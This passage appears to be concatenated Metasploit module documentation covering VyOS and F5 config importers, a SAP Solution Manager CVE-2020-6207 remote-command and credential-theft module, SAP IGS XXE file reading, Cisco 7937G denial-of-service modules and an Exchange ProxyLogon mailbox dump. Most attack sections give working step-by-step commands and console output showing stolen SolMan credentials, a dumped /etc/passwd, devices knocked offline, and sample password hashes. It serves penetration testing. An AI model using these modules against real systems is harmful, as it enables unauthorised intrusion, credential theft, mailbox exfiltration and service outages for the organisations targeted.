2. Start `msfconsole`
3. `use auxiliary/admin/networking/f5_config`
4. `set RHOST x.x.x.x`
5. `set CONFIG /tmp/file.config`
6. `run`
## Options
### RHOST
Needed for setting services and items to. This is relatively arbitrary.
### CONFIG
File path to the configuration file.
## Scenarios
### F5 Big-IP 15.1.0.2 (virtual on ESXi)
```
resource (f5.rb)> use auxiliary/admin/networking/f5_config
resource (f5.rb)> set config /home/h00die/Downloads/f5_config.txt
config => /home/h00die/Downloads/f5_config.txt
resource (f5.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (f5.rb)> set verbose true
verbose => true
resource (f5.rb)> run
[*] Running module against 127.0.0.1
[*] Importing config
[+] 127.0.0.1:22 SNMP Community 'public' with RO access
[+] 127.0.0.1:22 Hostname: f5bigip.home.com
[+] 127.0.0.1:22 MAC Address: aa:aa:aa:aa:aa:aa
[+] 127.0.0.1:22 Management IP: 2.2.2.2
[+] 127.0.0.1:22 Product BIG-IP
[+] 127.0.0.1:22 OS Version: 15.1.0.2
[+] Config import successful
[*] Auxiliary module execution completed
```
@@ -0,0 +1,223 @@
## Vulnerable Application
### General Notes
This module imports a VyOS configuration file into the database.
This is similar to `post/networking/gather/enum_vyos` only access isn't required,
and assumes you already have the file.
VyOS is available to download from [VyOS.io](https://downloads.vyos.io/).
Example config file:
#### VyOS 1.3
```
interfaces {
ethernet eth0 {
address 10.10.10.10/24
description "desc two"
hw-id 00:0c:29:ab:ce:16
}
ethernet eth1 {
hw-id 00:0c:29:ab:ce:20
}
loopback lo {
}
}
service {
snmp {
community ro {
authorization ro
}
community write {
authorization rw
}
}
}
system {
config-management {
commit-revisions 100
}
console {
device ttyS0 {
speed 115200
}
}
host-name vyos
login {
user vyos {
authentication {
encrypted-password $6$km/6j4hX0Ayo$dk2z5LeUOayHopgLGZJII0whBMidnvsd4LfT6LcIcR9ReabX0kcXjZOlmmqDGWuo1FvpnV.X2IRl5NeEZpuI31
plaintext-password ""
}
}
}
ntp {
server 0.pool.ntp.org {
}
server 1.pool.ntp.org {
}
server 2.pool.ntp.org {
}
}
syslog {
global {
facility all {
level info
}
facility protocols {
level debug
}
}
}
}
// Warning: Do not remove the following line.
// vyos-config-version: "broadcast-relay@1:cluster@1:config-management@1:conntrack@1:conntrack-sync@1:dhcp-relay@2:dhcp-server@5:dhcpv6-server@1:dns-forwarding@3:firewall@5:https@2:interfaces@12:ipoe-server@1:ipsec@5:l2tp@3:lldp@1:mdns@1:nat@5:ntp@1:pppoe-server@4:pptp@2:qos@1:quagga@6:salt@1:snmp@2:ssh@2:sstp@2:system@18:vrrp@2:vyos-accel-ppp@2:wanloadbalance@3:webgui@1:webproxy@2:zone-policy@1"
// Release version: 1.3-rolling-202008270118
```
#### VyOS 1.1.8
```
interfaces {
ethernet eth0 {
description "eth0 main"
duplex auto
hw-id 00:0c:29:f4:45:0a
smp_affinity auto
speed auto
vif 90 {
address dhcp
}
}
ethernet eth1 {
address 10.10.10.10/24
duplex auto
hw-id 00:0c:29:f4:45:14
smp_affinity auto
speed auto
}
loopback lo {
}
}
service {
snmp {
community ro {
authorization ro
}
community write {
authorization rw
}
}
}
system {
config-management {
commit-revisions 20
}
console {
}
host-name vyos118
login {
user jsmith {
authentication {
encrypted-password $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
plaintext-password ""
}
full-name "john smith"
level operator
}
user vyos {
authentication {
encrypted-password $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
plaintext-password ""
}
level admin
}
}
ntp {
server 0.pool.ntp.org {
}
server 1.pool.ntp.org {
}
server 2.pool.ntp.org {
}
}
package {
auto-sync 1
repository community {
components main
distribution helium
password ""
url http://packages.vyos.net/vyos
username ""
}
}
syslog {
global {
facility all {
level notice
}
facility protocols {
level debug
}
}
}
time-zone UTC
}
/* Warning: Do not remove the following line. */
/* === vyatta-config-version: "cluster@1:config-management@1:conntrack-sync@1:conntrack@1:cron@1:dhcp-relay@1:dhcp-server@4:firewall@5:ipsec@4:nat@4:qos@1:quagga@2:system@6:vrrp@1:wanloadbalance@3:webgui@1:webproxy@1:zone-policy@1" === */
/* Release version: VyOS 1.1.8 */
```
## Verification Steps
1. Have a VyOS configuration file
2. Start `msfconsole`
3. `use auxiliary/admin/networking/vyos_config`
4. `set RHOST x.x.x.x`
5. `set CONFIG /tmp/file.config`
6. `run`
## Options
### RHOST
Needed for setting services and items to. This is relatively arbitrary.
### CONFIG
File path to the configuration file.
## Scenarios
### VyOS 1.1.8
```
msf6 > use auxiliary/admin/networking/vyos_config
msf6 auxiliary(admin/networking/vyos_config) > set config /tmp/vyos.config
config => /tmp/vyos.config
msf6 auxiliary(admin/networking/vyos_config) > set verbose true
verbose => true
msf6 auxiliary(admin/networking/vyos_config) > run
[-] Auxiliary failed: Msf::OptionValidateError One or more options failed to validate: RHOSTS.
msf6 auxiliary(admin/networking/vyos_config) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf6 auxiliary(admin/networking/vyos_config) > run
[*] Running module against 1.1.1.1
[*] Importing config
[+] Config saved to: /home/h00die/.msf4/loot/20200920154519_default_1.1.1.1_vyos.config_295168.txt
[+] 1.1.1.1:22 Username 'jsmith' with level 'operator' with hash $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
[+] 1.1.1.1:22 Username 'vyos' with level 'admin' with hash $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
[+] 1.1.1.1:22 SNMP Community 'ro' with ro access
[+] 1.1.1.1:22 SNMP Community 'write' with rw access
[+] 1.1.1.1:22 Hostname: vyos118
[+] 1.1.1.1:22 OS Version: VyOS 1.1.8
[+] 1.1.1.1:22 Interface eth1 (00:0c:29:f4:45:14) - 10.10.10.10
[+] Config import successful
[*] Auxiliary module execution completed
```
@@ -0,0 +1,214 @@
## Vulnerable Application
This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute
OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
If a connected SMDAgent is also vulnerable to CVE-2019-0307, unauthenticated remote attackers can obtain its
secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
CVE-2019-0307 vulnerability paper: [The Agent Who Spoke Too Much][1]
CVE-2020-6207 vulnerability paper: [An Unauthenticated Journey to Root][2]
### Application Background
In SAP landscapes, SolMan could be compared to a domain controller system in the Microsoft world.
It is a technical system that is tightly connected to all other SAP systems with high privileges.
Once an SAP system is connected to the solution manager, it receives the name of a "managed" or "satellite" system.
As an administration solution, SolMan is intended to centralize the management of all systems within the landscape by
performing actions such as implementing, supporting, monitoring and maintaining the enterprise solutions.
### Installation Steps
Steps to install, configure and manage SolMan can be found online at [this page][3].
Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
## Verification Steps
1. Start msfconsole
1. Do: `workspace [WORKSPACE]`
1. Do: `use auxiliary/admin/sap/sap_2020_6207_solman_rce`
1. Do: `set RHOSTS [IP]`
1. Do: `set action LIST`
1. Do: `run`
1. Verify that a list of connected agents was returned.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set SSRF_METHOD [GET, POST, PUT, DELETE, PATCH, ...]`
1. Do: `set SSRF_URI [SSRF uri, example - http://1.1.1.1/test.html]`
1. Do: `set action SSRF`
1. Do: `run`
1. Verify that the HTTP request from the connected agent has been sent.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set COMMAND [OS command, example - ping -c 4 1.1.1.1]`
1. Do: `set action EXEC`
1. Do: `run`
1. Verify that the OS command has been executed on the connected agent.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set SRVHOST [Local IP]`
1. Do: `set action SECSTORE`
1. Do: `run`
1. Verify that the credentials for Solution Manager have been obtained.
## Options
### TARGETURI
This is the path to the EEM admin page of the SolMan that is vulnerable to CVE-2020-6207.
By default, it is set to `/EemAdminService/EemAdmin`. However, it can be changed if SolMan
was installed at a path different from that of the web root. For example, if the SolMan
server was proxied to the `/solman/` path under the web root, then this value would be
set to `/solman/EemAdminService/EemAdmin`.
### AGENT
Connected agent sever name.
Example: `linux_agent`
### SSRF_METHOD
HTTP method for sending HTTP request from a connected agent, the server name of which is specified in the `AGENT` option.
Example: `GET`
### SSRF_URI
URI for sending HTTP requests from a connected agent, the server name of which is specified in the `AGENT` option.
Example: `http://1.1.1.1/test.html`
### COMMAND
OS command for executing in connected agent, the server name of which is specified in the `AGENT` option.
Example: `ping -c 4 1.1.1.1`
## Actions
```
Name Description
---- -----------
EXEC Exec OS command on connected agent
LIST List connected agents
SECSTORE Get file with SolMan credentials from connected agent
SSRF Send SSRF from connected agent
```
## Scenarios
### Vulnerable SolMan 7.2 running on agent: test_linux with OS: Linux and java version: 1.8
```
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/cve_2020_6207_solman_rce
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION LIST
ACTION => LIST
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set RHOST 172.16.30.46
RHOST => 172.16.30.46
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Getting a list of agents connected to the Solution Manager: 172.16.30.46
[+] Successfully retrieved agent list:
Connected Agents List
=====================
Server Name Host Name Instance Name OS Name Java Version
----------- --------- ------------- ------- ------------
test_windows sap731.corp.test.com SMDA97 Windows Server 2008 R2 1.6.0_29
test_linux saperp7.corp.test.com SMDA98 Linux 1.8.0_25
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SSRF
ACTION => SSRF
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_METHOD PUT
SSRF_METHOD => PUT
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_URI http://192.168.50.3:7777/
SSRF_URI => http://192.168.50.3:7777/
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Start script: IqsDdgpc5Iwu with SSRF payload on agent: test_linux
[*] Stop script: IqsDdgpc5Iwu on agent: test_linux
[*] Delete script: IqsDdgpc5Iwu on agent: test_linux
[+] Send SSRF: 'PUT http://192.168.50.3:7777/ HTTP/1.1' from agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION EXEC
ACTION => EXEC
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set COMMAND ping -c 4 192.168.50.3
COMMAND => ping -c 4 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Start script: Lu5BnHgzVehn with RCE payload on agent: test_linux
[*] Stop script: Lu5BnHgzVehn on agent: test_linux
[*] Delete script: Lu5BnHgzVehn on agent: test_linux
[+] Execution command: 'ping -c 4 192.168.50.3' on agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SECSTORE
ACTION => SECSTORE
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SRVHOST 192.168.50.3
SRVHOST => 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Using URL: http://192.168.50.3:8000/ginMlA2izrNi
[*] Start script: ginMlA2izrNi with payload for retrieving SolMan credentials file from agent: test_linux
[*] Received HTTP request from agent test_linux - 172.16.30.14
[+] Successfully retrieved file /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties from agent: test_linux saved in: /Users/vladimir/.msf4/loot/20210327204344_SAP_TEST_172.16.30.14_smdagent.secstor_025841.txt
[+] Successfully encoded credentials for SolMan server: 172.16.30.46:50000 from agent: test_linux - 172.16.30.14
[+] SMD Username: j2ee_admin
[+] SMD Password: asdQWE123
[*] Stop script: ginMlA2izrNi on agent: test_linux
[*] Delete script: ginMlA2izrNi on agent: test_linux
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.30.46 172.16.30.46 50000/tcp (soap) j2ee_admin asdQWE123 Password
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.46 50000 tcp soap open SAP Solution Manager
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2021-03-27 17:49:37 UTC 172.16.30.46 SAP Solution Manager remote unauthorized OS commands execution CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207
2021-03-27 17:49:41 UTC 172.16.30.14 Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.14 smdagent.secstore.properties /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties text/plain SMD Agent secstore.properties file /Users/vladimir/.msf4/loot/a228e5f820edc34bc767-20210327204941_SAP_TEST_172.16.30.14_smdagent.secstor_283920.txt
```
[1]: https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
[2]: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
[3]: https://blogs.sap.com/2016/02/16/solution-manager-72-installation-and-configuration-i-installations/
@@ -0,0 +1,168 @@
## Vulnerable Application
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page
of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These
vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when
submitting a POST request to the XMLCHART page to generate a new chart.
Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user
from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers
can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable
SAP IGS server.
### Application Background
The Internet Graphics Service (IGS) where it provides a way infrastructure to enable developers to display graphics
in an internet browser with minimal effort. It has been integrated in several different SAP UI technologies
where it provides a way for data from another SAP system or data source to be utilized to generate
dynamic graphical or non-graphical output.
### Installation Steps
Steps to install and update the SAP IGS server can be found online on [this page][2].
Additional information on configuring the IGS server can be found [here][3].
Finally information on administering the IGS server can be found [here][4].
Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
## Verification Steps
1. Start msfconsole
1. Do: `workspace [WORKSPACE]`
1. Do: `use auxiliary/admin/sap/sap_igs_xmlchart_xxe`
1. Do: `set RHOSTS [IP]`
1. Do: `set FILE [remote file name]`
1. Do: `set action READ`
1. Do: `check`
1. Verify that the `check` method correctly identifies if the target is vulnerable or not.
1. Do: `run`
1. Verify that the contents of the file you specified were returned.
## Options
### FILE
File to read from the remote server. Example: `/etc/passwd`
### URIPATH
This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE.
By default it is set to `/XMLCHART`, however it can be changed if the SAP IGS server
was installed under a different path than the web root. For example if the SAP IGS
server was installed to the `/igs/` path under the web root, then this value would be
set to `/igs/XMLCHART`.
## Actions
```
Name Description
---- -----------
READ Remote file read
DOS Denial Of Service
```
## Scenarios
### Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1
```
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.30.29 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29
[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.29 40080 tcp http open SAP Internet Graphics Server (IGS)
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2020-10-07 10:12:37 UTC 172.16.30.29 SAP Internet Graphics Server (IGS) XMLCHART XXE CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.29 igs.xmlchart.xxe /etc/passwd text/plain SAP IGS XMLCHART XXE /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
```
[1]: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
[2]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193dbeb5c617e2e10000000a42189b.html
[3]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e1939c9b5c617e2e10000000a42189b.html
[4]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193988b5c617e2e10000000a42189b.html
@@ -0,0 +1,104 @@
## Vulnerable Application
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
### Description
This module exploits a bug in how the conference station handles incoming SSH
connections that provide an incompatible key exchange. By connecting with an
incompatible key exchange, the device becomes nonresponsive until it is manually power cycled.
## Verification Steps
1. Obtain a Cisco 7937G Conference Station.
2. Enable SSH Access on the device.
3. Start msfconsole
4. Do: `use auxiliary/dos/cisco/cisco_7937G_dos`
5. Do: `set RHOST 192.168.1.10`
6. Do: `run`
7. The conference station should now be nonresponsive until it is power cycled
## Options
No options
## Scenarios
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
#### Successful Scenario:
```
msf5 > use auxiliary/dos/cisco/cisco_7937G_dos
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
[*] Starting server...
[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - Traceback (most recent call last):
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
[-] 192.168.110.209 - self._handler_table[ptype](self, m)
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
[-] 192.168.110.209 - self._parse_kex_init(m)
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
[-] 192.168.110.209 - raise SSHException(
[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 -
[*] 192.168.110.209 - dos non-reset attack completed!
[*] 192.168.110.209 - Errors are intended.
[*] 192.168.110.209 - Device must be power cycled to restore functionality.
[*] Auxiliary module execution completed
```
#### Unsuccessful Scenario:
```
msf5 > use auxiliary/dos/cisco/cisco_7937G_dos
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
[*] Starting server...
[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
[*] Auxiliary module execution completed
```
### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
#### Successful Scenario:
```
msf5 > use auxiliary/dos/cisco/cisco_7937G_dos
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
[*] Starting server...
[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - Traceback (most recent call last):
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
[-] 192.168.110.209 - self._handler_table[ptype](self, m)
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
[-] 192.168.110.209 - self._parse_kex_init(m)
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
[-] 192.168.110.209 - raise SSHException(
[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 -
[*] 192.168.110.209 - dos non-reset attack completed!
[*] 192.168.110.209 - Errors are intended.
[*] 192.168.110.209 - Device must be power cycled to restore functionality.
[*] Auxiliary module execution completed
```
#### Unsuccessful Scenario:
```
msf5 > use auxiliary/dos/cisco/cisco_7937G_dos
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run
[*] Starting server...
[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
[*] Auxiliary module execution completed
```
@@ -0,0 +1,54 @@
## Vulnerable Application
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
### Description
This module exploits a bug in how the conference station handles executing a ping via its web interface.
By repeatedly executing the ping function without clearing out the resulting output,
a DoS is caused that will reset the device after a few minutes.
## Verification Steps
1. Obtain a Cisco 7937G Conference Station.
2. Enable Web Access on the device (default configuration).
3. Start msfconsole
4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot`
5. Do: `set rhost 192.168.1.10`
6. Do: `run`
7. The conference station should become nonresponsive and then power cycle itself.
## Options
No options
## Scenarios
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
```
msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
[*] Starting server...
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
[*] 192.168.110.209 - DoS reset attack completed!
[*] Auxiliary module execution completed
```
### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
```
msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
[*] Starting server...
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
[*] 192.168.110.209 - DoS reset attack completed!
[*] Auxiliary module execution completed
```
@@ -0,0 +1,161 @@
## Vulnerable Application
CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to
bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack
chain used to perform an RCE (Remote Code Execution).
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
### Introduction
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the
authentication and impersonating as the admin (CVE-2021-26855).
By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments,
contacts, ...).
All components are vulnerable by default.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/gather/exchange_proxylogon`
3. Do: `set RHOSTS [IP]`
4. Do: `set EMAIL [EMAIL ADDRESS]`
5. Do: `run`
## Options
### ATTACHMENTS
Dump documents attached to an email. Default: true
### EMAIL
The email account what you want dump.
### FOLDER
The email folder what you want dump. Default: inbox
It is also possible to use other attributes such as: drafts, sentitems, ...
More info about this in the references.
### METHOD
HTTP Method to use for the check (only). Default: POST
### TARGET
Force the name of the internal Exchange server targeted.
## Advanced Options
### MaxEntries
Override the maximum number of object to dump.
## Auxiliary Actions
### Dump (Contacts)
Dump user contacts from exchange server.
### Dump (Emails)
Dump user emails from exchange server.
